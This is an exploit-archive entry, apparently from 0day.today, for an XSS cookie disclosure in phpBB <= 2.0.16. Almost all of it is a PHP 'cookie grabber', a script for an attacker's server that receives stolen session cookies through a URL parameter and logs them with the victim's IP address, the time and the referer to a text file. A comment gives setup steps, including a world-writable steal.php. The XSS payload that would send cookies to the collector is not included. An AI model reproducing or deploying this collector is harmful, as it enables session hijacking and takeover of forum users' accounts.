id: 153
date: 07/12/2005
title: phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
author: Sjaak Rake
cves: 

=====================================================================
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
=====================================================================




<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

//rename it to cookies.php and create one new file steal.php and chmod it to 777



#  0day.today [2023-03-23]  #